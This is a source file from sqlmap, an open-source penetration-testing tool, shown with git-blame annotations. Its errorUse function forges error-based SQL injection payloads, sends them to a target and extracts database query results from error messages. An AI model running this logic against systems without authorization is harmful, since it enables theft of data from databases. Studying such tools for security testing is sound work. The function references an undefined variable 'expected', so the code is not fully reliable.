2010-10-20 13:09:04 +04:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
|
|
|
"""
|
|
|
|
$Id$
|
|
|
|
|
|
|
|
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
|
|
|
|
See the file 'doc/COPYING' for copying permission
|
|
|
|
"""
|
|
|
|
|
|
|
|
import re
|
|
|
|
import time
|
|
|
|
|
|
|
|
from lib.core.agent import agent
|
|
|
|
from lib.core.common import getUnicode
|
|
|
|
from lib.core.common import randomInt
|
|
|
|
from lib.core.common import replaceNewlineTabs
|
|
|
|
from lib.core.common import safeStringFormat
|
|
|
|
from lib.core.convert import urlencode
|
|
|
|
from lib.core.data import conf
|
|
|
|
from lib.core.data import kb
|
|
|
|
from lib.core.data import logger
|
|
|
|
from lib.core.data import queries
|
|
|
|
from lib.core.session import setError
|
|
|
|
from lib.core.unescaper import unescaper
|
|
|
|
from lib.request.connect import Connect as Request
|
|
|
|
from lib.utils.resume import resume
|
|
|
|
|
|
|
|
from lib.core.settings import ERROR_SPACE
|
|
|
|
from lib.core.settings import ERROR_EMPTY_CHAR
|
2010-10-20 13:35:46 +04:00
|
|
|
from lib.core.settings import ERROR_START_CHAR
|
|
|
|
from lib.core.settings import ERROR_END_CHAR
|
2010-10-20 13:09:04 +04:00
|
|
|
|
|
|
|
def errorUse(expression, resumeValue=True):
|
|
|
|
"""
|
|
|
|
Retrieve the output of a SQL query taking advantage of an error SQL
|
|
|
|
injection vulnerability on the affected parameter.
|
|
|
|
"""
|
|
|
|
logic = conf.logic
|
|
|
|
randInt = randomInt(1)
|
|
|
|
query = agent.prefixQuery(" %s" % queries[kb.misc.testedDbms].error)
|
|
|
|
query = agent.postfixQuery(query)
|
|
|
|
payload = agent.payload(newValue=query)
|
2010-10-20 13:46:57 +04:00
|
|
|
startLimiter = ""
|
|
|
|
endLimiter = ""
|
2010-10-20 13:09:04 +04:00
|
|
|
|
|
|
|
if resumeValue:
|
|
|
|
output = resume(expression, payload)
|
|
|
|
else:
|
|
|
|
output = None
|
|
|
|
|
|
|
|
if output and ( expected is None or ( expected == "int" and output.isdigit() ) ):
|
|
|
|
return output
|
|
|
|
|
|
|
|
if kb.dbmsDetected:
|
|
|
|
_, _, _, _, _, _, fieldToCastStr = agent.getFields(expression)
|
|
|
|
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
|
|
|
|
if kb.dbms == "MySQL":
|
|
|
|
nulledCastedField = nulledCastedField.replace("CHAR(10000)", "CHAR(255)") #fix for that 'Subquery returns more than 1 row'
|
|
|
|
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
|
|
|
|
expressionUnescaped = unescaper.unescape(expressionReplaced)
|
2010-10-20 13:46:57 +04:00
|
|
|
startLimiter = unescaper.unescape("'%s'" % ERROR_START_CHAR)
|
|
|
|
endLimiter = unescaper.unescape("'%s'" % ERROR_END_CHAR)
|
2010-10-20 13:09:04 +04:00
|
|
|
else:
|
|
|
|
expressionUnescaped = unescaper.unescape(expression)
|
|
|
|
|
|
|
|
debugMsg = "query: %s" % expressionUnescaped
|
|
|
|
logger.debug(debugMsg)
|
|
|
|
|
2010-10-20 13:46:57 +04:00
|
|
|
forgedPayload = safeStringFormat(payload, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
|
2010-10-20 13:09:04 +04:00
|
|
|
result = Request.queryPage(urlencode(forgedPayload), content=True)
|
|
|
|
|
2010-10-20 13:35:46 +04:00
|
|
|
match = re.search('%s(?P<result>.+?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE)
|
2010-10-20 13:09:04 +04:00
|
|
|
if match:
|
|
|
|
output = match.group('result')
|
|
|
|
if output:
|
|
|
|
output = output.replace(ERROR_SPACE, " ").replace(ERROR_EMPTY_CHAR, "")
|
|
|
|
|
|
|
|
if conf.verbose > 0:
|
|
|
|
infoMsg = "retrieved: %s" % replaceNewlineTabs(output, stdout=True)
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
return output
|